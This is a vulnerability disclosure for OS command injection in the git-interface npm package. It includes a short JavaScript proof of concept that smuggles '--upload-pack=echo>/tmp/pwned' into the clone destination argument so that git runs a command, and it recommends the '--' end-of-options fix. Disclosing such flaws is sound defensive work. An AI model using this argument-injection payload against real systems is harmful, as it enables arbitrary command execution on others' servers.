# Command Injection vulnerability in [email protected]

`git-interface` describes itself as an "Interface to work with a git repository in node.js".

Resources:
* Project’s GitHub source code: https://github.com/yarkeev/git-interface
* Project’s npm package: https://www.npmjs.com/package/git-interface

I'm reporting an OS Command Injection vulnerability in the `git-interface` npm package. The API may be abused if user input is able to provide a valid directory on disk and also supply the destination directory to clone a repository to.

## Proof of Concept exploit

Install `[email protected]`, which is the latest version.

Run the following code with the following precondition: the `/tmp/new` directory needs to exist (it doesn't need to be a git-initialized directory, though), so an attacker could provide a predictable path such as `/usr/src`:

```js
const { Git } = require('git-interface');

const git = new Git({
  dir: '/tmp/new' // default path is the current directory
});

// the second argument is meant to be the destination directory, but is
// interpreted by git as the --upload-pack option
git.clone('file:///tmp/new', '--upload-pack=echo>/tmp/pwned');
```

Observe that a new file has been created: `/tmp/pwned`

# Mitigation suggestions

Use the `--` end-of-options notation as a suffix to the supported command-line arguments (if any are passed at all), to make sure that input passed to the git command is treated as positional arguments rather than command-line options. For example: `git clone -- <repository> <directory>` would prevent the path and destination from being interpreted as command-line options by the git command.

# Author

Liran Tal
